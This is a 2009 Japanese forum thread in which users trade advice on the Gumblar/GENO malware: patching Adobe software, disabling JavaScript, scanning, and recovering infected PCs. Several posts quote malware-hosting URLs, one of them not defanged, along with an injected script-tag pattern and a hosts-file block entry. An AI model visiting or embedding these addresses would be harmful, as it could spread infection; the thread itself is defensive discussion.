1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ] ■ adobe readerを最新版にアップデートする ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。 インストール後本体をアップデートしておく事 adobe readerを開いて ヘルプ→アップデートの有無をチェック ■ adobe flashplayerを最新版に更新 ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨 ■ acrobat javascriptをオフに adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す ■ブラウザでスクリプト使用を基本無効に設定 FirefoxにてNoscriptを利用 (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す) (sleipnir、IEでも上手に設定するとなんとかなります) 優先度低 ■ Vistaの人ははUACをONにする ■ hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 martuz.cn hostsファイルの在処 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 Windows 95/98/MEの場合→「C:\Windows」 感染が疑わしい人は迷わずクリーンインストール推奨です。 ★Anubisレポート ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★GENOウイルスまとめ ttp://www29.atwiki.jp/geno/
541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:17:31 ] >>540 前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、 そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、 上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか 確実にわかるんじゃないかな 今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、 むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが
542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:34:17 ] >>541 ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。 Macのほうはメインマシンだから1日かかりそう>< とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる
543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:52:04 ] Avast!がPDFの検出をするようになった SWFは未確認
544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:02:39 ] もうすぐnortonの期限が切れそうでどれにしようか迷っている ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・ カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象
545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:05:35 ] スレ違いっぽいが GENOの話ならノートンは対応してるぞ
546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:10:38 ] 新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう
547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:13:07 ] 一口にGENO(新旧gamblar)と言っても、いくつものファイルが関係するから ウイルス対策ソフトがどの段階で検知するかはマチマチ 全部スルーして、穴があるシステムはやられる
548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:14:39 ] MSの脆弱だけじゃないからね。 Adobeの脆弱性はノートンはやってくれないし。
549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:16:51 ] >>548 やってくれないとは? 間違いだと思うが
550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ] 嘘ばっかり言いやがるからな 2chだし適当に
551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ] >>530 www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880 > Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。 > G Dataが「JS:Downloader-EZ」で13件を検出した。 G DataのEZって…
552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:24:38 ] >>546 ベストかもしれないが、現実的には_ うちの事務所は、みんなXPだし とりあえず、うpだて最新にしとくことか…
553 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:32:28 ] そういえばアドビやSunJavaのブラッドハウンドは見たことないね
554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:37:29 ] >>546 個人なら切り替えはまだ容易だろうが 企業、特に中小企業だと業務用のPC全てを XPから切り替えるのは容易ではない
555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:41:37 ] このスレを覗きに来るような人たちには釈迦に説法だろうけど、 パッチ管理は多少面倒でももっとも効果的な対策 個人利用は無料のSecunia PSIで定期的なチェックをお勧め Secunia Personal Software Inspector(PSI)ダウンロードページ ttp://secunia.com/vulnerability_scanning/personal/ 日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも
556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:06:16 ] >>548-550 >>553 > 嘘ばっかり言いやがるからな > 2chだし適当に ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp こちらを自分の目でご覧になりました?
557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:11:55 ] >>556 何を言いたいんだ? 書いてあるねってことかな
558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 06:54:08 ] 今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は カスペやAvastやノートン?でスキャンすれば検出や駆除が きちんとできると思っていいのかな? それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。 またすぐに違う亜種がでたらそれは別だろうけど。
559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 07:09:31 ] >>539 タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。 新バージョンで「Quietモード」が追加されてる。 hide9999.web.fc2.com/
560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 16:58:43 ] Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到 ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047
561 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:22:52 ] 感染したHDドライブをスキャン中。 ノートンひっかかってくれるかな。。。
562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:30:55 ] 未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。
563 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:37:47 ] くるくるたああああああああああああああああいむ
564 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:51:34 ] すでに10万ファイル調べてるのにひっかからん くるくるたああああああああああああいむ
565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:59:10 ] Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが こういった一時的な利用なら カスペルとAVASTの両方の検索エンジンを搭載した G-DATAでスキャンしてみるのも良いかもしれない
566 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:01:59 ] >>561 ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか?
567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:06:11 ] 今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね
568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 00:57:50 ] だから良くなったんだろ
569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 04:46:17 ] www●george-ohtsuka●com これはGENOですか?別のウイルス?
570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 05:46:27 ] >>569 流行のGENO踏み台型感染(Web改ざん)タイプ、サイト管理人のPCも感染してる </head>と<body>の間にscriptを1行仕込まれている script src=●●●●//psunrise●cn/images-d/index2●php
571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 06:31:28 ] >>569 あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい どうしてオランダ?
572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 07:27:02 ] >>569 新型GENO(gumblar.x)と、iframeインジェクションの両方に改竄されてるね。 ちなみに>>525 の報告のように、 gumblar一派とiframeインジェクション一派は抗争中らしいw ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27 ttp://ilion.blog47.fc2.com/blog-entry-155.html ショバ(botに引き込む無防備なPC)を取り合ってるのだろうか。
573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 14:40:46 ] 感染したHDD、定義済みノートンで検知せず。 カスペでスキャン中。 やっぱりリカバリしかないのかな。 どっちにしろレジストリいじらなきゃだめか。
574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 16:53:40 ] >>573 リカバリしてもレジストリいじらなきゃだめなの?
575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 17:19:46 ] リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。
576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 20:59:36 ] >>573 どうして感染したと分かるの? 起動時に黒い画面? 黒い画面だと、どうやってPCを起動させて、スキャンしてるの?
577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:03:05 ] IQが低いとそんな書き込みしかできない
578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:25:51 ] PCが、いちだ〜い、にだ〜い、… ヒュ〜、どろどろどろ…
579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:58:53 ] >>575 ドライブがリカバリディスクを認識するものの 数時間まっても始まらないから、そこらへんもやられちゃってると思う。 調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。 一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。 スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。 とりあえず1症例として書いてみました。
580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:07:03 ] それは別のもんに感染してるんじゃないの あとCDもしくはDVDドライブからの起動にしてる?
581 名前:579 mailto:sage [2009/10/28(水) 23:36:31 ] カスペのスキャン後に復活したみたいです。 ありがたいことにレジストリまで修正してくれるみたいだ。 駆除リストから詳細を調べたいが、 カスペがウィルスリストをぜんぜん登録してくれてない。。。 不具合としては、ユーザープロファイルが読み込めなる様子。 アカウント移行すれば問題ないです。 >>580 今回のでビンゴだったみたいです、 カスペの公式サイトのウイルス名と違ったもので。 ありがとうございます。
582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:41:55 ] 検出名隠蔽してたら誰もわからんわな
583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 08:53:46 ] これはGENOウイルスでしょうか? 症状: Vistaにて 起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。 セーフモードだと起動。 regeditとcmdは起動。 sqlsodbc.chmも存在。ファイルサイズは通常通り。 どうでしょうか?
584 名前:名無しさん@お腹いっぱい。 [2009/10/29(木) 11:43:10 ] 1.感染したマシンからHDD抜く 2.HDDケースに入れる 3.感染していないPCにカスペたん入れる 4.感染しているHDDを外付けで3.のマシンに接続 5.スキャン で駆除できるのかな? 人柱も嫌だし感染マシンが無いので検証してないけど
585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 15:34:50 ] >>583 >起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。 この症状はもろにそんなかんじだね
586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 18:05:01 ] >>583 UAC切ってたのか?
587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 08:52:48 ] >>583 いえ、ONにしてました。 悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。
588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 14:53:51 ] 利用してる脆弱性はAdobeだけじゃないんでなんとも まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね
589 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:16:28 ] 構造的には現状ではUACはスルーできんはずだが? 特にvistaのUACは7のデフォルト設定より粘着質 勢いで許可したかupdateのフェイクにでも引っかかったか
590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:26:15 ] >>583 カスペルのオンラインスキャナーではどうなりました?
591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:41:44 ] >>583 それGENOじゃあないだろ Daonolだと思うんだが?
592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:51:27 ] Daonolはvistaは対象外で手口もGENOとそう変わらない
593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 02:12:59 ] じゃあなんなんだ 別のウイルスかハードの寿命か
594 名前:名無しさん@お腹いっぱい。 [2009/10/31(土) 10:30:44 ] パソコンのことはよく知らずにいたのが わるかったんだけどなんかうちのサイト、感染したっぽい。 avast!が反応するようになっちゃった。 ファイル名 ttp://hd-select●com/blog/mail/mail_test.php マルウェア名 JS:Redirector-H7 [Trj] って出るんです。 ファイル名のサイト、バイクの通販かなんかだがこんなサイト いったことないのになあ。 感染確認の類は全部やって異常は見られなかったけど 悲しいかな、サイトは削除しました。
595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 18:08:11 ] 典型的なGENOですね バイクの通販サイトは・・・多分、あそこかなw
596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:08:38 ] 質問させてください OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓ fancyrat ●ru/cgi-bin/pomet2008●php とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。
597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:15 ] 要求されたURLのWebページを表示できません URL: fancyrat.ru/cgi-bin/pomet2008.php このWebページはウイルスに感染しています 次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x
598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:58 ] aaa miss url変えてなかった。 開かんでおくれ。
599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:44:40 ] >>594 関係ないサイトのコードが注入されるのが典型的なパターン サイトは削除だけじゃなくそのサイト自体が無効にならないと そのままのっとられる可能性があるので注意してください 感染確認というのが旧型Genoの確認方法だとしたら意味がないので カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください
600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:45:56 ] >>596 はい 新型のほうのGenoです スキャンは他のメーカーのでもしてみてね
601 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 01:00:36 ] レス下さった方ありがとうございます、新型なんですね…… バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。
602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 02:29:58 ] 最新の定義ならブロックしてくれてる可能性もあるが まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう
603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:26:46 ] firefox用のpdfプラグインは9.1.0.163が最新? readerは9.2だけどこれでいいのかな
604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:40:56 ] 今更だけどなんでこうなったという感じだな 去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった 一体、Gumblarの作者は何を考えて作ったんだろうか vistaだけど巡回しまくるから油断はできないな
605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:01:26 ] >>597 情報収集をするためにこのスレをロムっていたが ミスって踏んでしまった…
606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:20:11 ] >>605 大丈夫?
607 名前:605 mailto:sage [2009/11/01(日) 19:42:24 ] >>606 まとめの感染確認方法で調べてみましたが 一応、セーフでした、お騒がせして申し訳ありません。
608 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 20:19:53 ] それは意味ないと何度言えば
609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 21:12:40 ] vista/7ならおそらくセーフ XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも 新型が未知のセキュリティホールを突いていたらの話だけど
610 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:11:53 ] GENOに限った話ではないのですが、 ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に 的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか?
611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:44:39 ] >>610 メールで教えるのは考え直した方がいいかと
612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 23:53:21 ] >>610 どんなに丁寧にいっても聞かないやつは聞かない ぼくの環境では異常ありませんけど^^;とか言われる レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ
613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 16:11:17 ] >>597 こういう判定ってどこでできるの?
614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 17:34:15 ] aguseで確認すればいいだろ。
615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 19:55:16 ] 過信は禁物だけどな
616 名前:610 mailto:sage [2009/11/02(月) 20:48:14 ] 調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。 www.ipa.go.jp/security/todoke/ ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:52:12 ] >>616 報告したならもうそれでいいだろ >ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・ ってわざわざうrl貼られても困るしここで聞くことじゃない
618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:53:53 ] >>617 それは大変失礼しました。
619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 21:44:39 ] >>616 どちらでも何らかの対処はされると思います レンタルサーバ側に直接連絡してもたいていは対応してくれるはず 数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな
620 名前:名無しさん@お腹いっぱい。 [2009/11/02(月) 22:29:02 ] ずいぶん情報集まってきたな itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/
621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:09:53 ] すみません、情報下さい。 クレクレなのは承知です デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから 復帰する時にgenoウイルスに感染した様です。 起動すると真っ黒な画面にマウスポインタがポツリ。 セーフモードでも同様。 とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。 しかし、エラー多発で起動せず。 前回は動作したのでメディアの問題ではないかと。 で、富士通のサポートHPによると回復できる様ですが、 その際データが消去されないか心配です。 その点については触れられていなかったので・・・ ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。 この場合、データは消去されてしまいますか? 本当に困っています。 釣りではありません。 どうか教えて下さい。
622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:41:41 ] >>621 > デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから > 復帰する時にgenoウイルスに感染した様です。 このとき感染したんじゃなくてその前から 感染してて復帰タイミングで発病したってだけでしょ ubuntuの前回使用はいつなの? メディアの問題じゃないってなんで断言できるの? コマンドプロンプトからの復帰もしくはリカバリと https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1 コマンドプロンプトの操作だけで復帰できればおそらく問題なし リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません > ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。 これは何が言いたいのかわかりません。 > 本当に困っています。 だから何? 本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。
623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 01:16:49 ] >>622 私の書き込みによって不快にさせてしまいましたか? もしそうであれば申し訳ありません。 データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。 それでもダメでしたら、素直にメーカーに修理にだします。 ありがとうございました。 スレ汚しすみませんでした。
624 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 04:49:27 ] 管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに そのサイトが感染してた期間中頻繁にアクセスしてたので、 今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、 黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、 むしろなぜ感染しなかったのか不思議です。 OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、 AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、 最新のひとつかふたつ前ぐらいのバージョンの状態でした。 Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、 それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか? 前回のGENOみたいに、感染したらファイルのサイズが変わるとか 確認できる方法があれば、まだ分かりやすいのにな。
625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:07:04 ] >>624 最新のひとつかふたつ前だったからOKだったんだなきっと
626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:36:11 ] >>625 やはりそう思われますか? 過信はもちろん禁物ですが、今回の新型に限っては カスペルが感染してたら検出できるようですし やっぱりギリギリセーフだったのかな? ということは今回の新型は、最新のひとつかふたつ前より更に前の 脆弱性を狙ったものだったということになるのかもしれませんね。 もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。
627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 07:21:58 ] いろんなサイトを巡回する人は特に注意 OSとAdobeのアップデート XPでもFirefox+NoScriptでだいたいは防げる
628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 09:46:35 ] お客様のPCが起動不能に どうやらDaonolのようでした
629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:06:21 ] >>624 挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない 被害サイトアクセスした時期によるかも 脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで 更新してなきゃくらってたはず
630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:07:24 ] ついでにこれを機にSP3まであてて最新のパッチを当ててね
631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 21:28:47 ] >>629 無効化されたあとではなかったみたい。 そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、 感染そのままの状態だったようで、その間何度も見にいってたから、 最新にはしてなかったから絶対に感染したと思ってました。
632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 22:47:25 ] >>631 そのサイトがどこかわからんけど無効化されていたかどうか 実際に見てないならわからないよ サイト管理者が確認したのは自分のサイトの改変だけじゃないの 実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト 自分のサイトは改変されてても挿入元がすでに消去もしくは コード改変による無効化が行われていたとしたら閲覧したPCに被害は ないかもしれないってだけだよ
633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:00:36 ] >>632 なるほど!スクリプトなどを書かれてソースコード改変イコール確実に感染 かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、 挿入元がすでに消去とかされてる場合もあるのですね。 FTPにもかなり何度もアタックがありパスも書き換えられて 盗み見されたようでいたちごっこのようだったとも書かれていたので、 その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、 そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、 分かりやすく何度も教えて下さって本当にありがとうございます。 検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。 でもこれからはもっとupdateとか気をつけなければ。 本当にレスありがとうございました。何度もうざい連投すみません。
634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:27:03 ] 何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ ブラウザが古いキャッシュでも見てたのかな
635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:29:26 ] コード改変による無効化って、感染→スクリプト挿入などのコード改変 →更に自動的に無効化? うーん? 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、 そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな? スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、 更に最終的に立ち上がらないようにまでしてしまうということなのかね 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、 そこで終わってセーフてことか
636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 01:35:36 ] 挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく それを適当に無効化っていっちゃってるかんじですはい なんつーかよくわからないまま混乱しちゃってるんじゃないかな めんどいんで引用で > 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、 > そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな? なんかちょっと違う気もするけどなんとなくはい > スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、 これはいいえ 脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く 攻撃が失敗か成功かってだけ > 更に最終的に立ち上がらないようにまでしてしまうということなのかね これは向こうのミスでそうなってしまったらしい 情報搾取が目的だから起動不能になるのは失敗なはず ならないパターンもあるかもしれないしないかもしれない > 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、 > そこで終わってセーフてことか まあはい そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない 一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです
637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:40:54 ] あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ 今はXPがたまたま脆弱性を突かれただけで 当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう 自覚を忘れないことが大切だと思うよ
638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:45:39 ] それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか 反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか 丁寧にサンクス! >>634 何度もその感染してた期間に閲覧してたみたいだから 古いキャッシュでも見てたというのはさすがにないんじゃないか? それとも攻撃側がってことか?
639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:00:00 ] だよなー なんだろうなあ カスペのスキャンが実は古かったとかないよね
640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:04:38 ] 今のところ突かれている脆弱性は既知のものだけなのは幸いだな。 攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。
641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:19:32 ] 偶然発見しちゃうときもあるから大丈夫ともいえないけどね
642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:33:03 ] >>639 カスペは試用版ですが、データはもちろん最新にしてスキャンしました。 foxとノースクリプトを使っていたので大丈夫だったのかな? とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。 やっぱり安心せずにリカバリするべきなのかな…。
643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:36:31 ] 今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には gumblarで検知されて駆除されるんだよね 実際にカスペルスキーで見つかって駆除した人いないかな?
644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:39:13 ] >>642 NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず それで大丈夫だったのかも まあ心配ならリカバリが一番安全安心確実
645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:48:40 ] ちと疑問 新型GENOは、感染してからファイルやデータを バックアップしても平気というか間に合うのか?
646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 07:23:33 ] GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい?
647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 08:13:05 ] >>583 おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった?
648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:41:38 ] >>646 不活性化されたまんまHDDに残るを詳しく頼む
649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:53:48 ] そのまんまだよ 動かないけどファイルは残ってるってこと
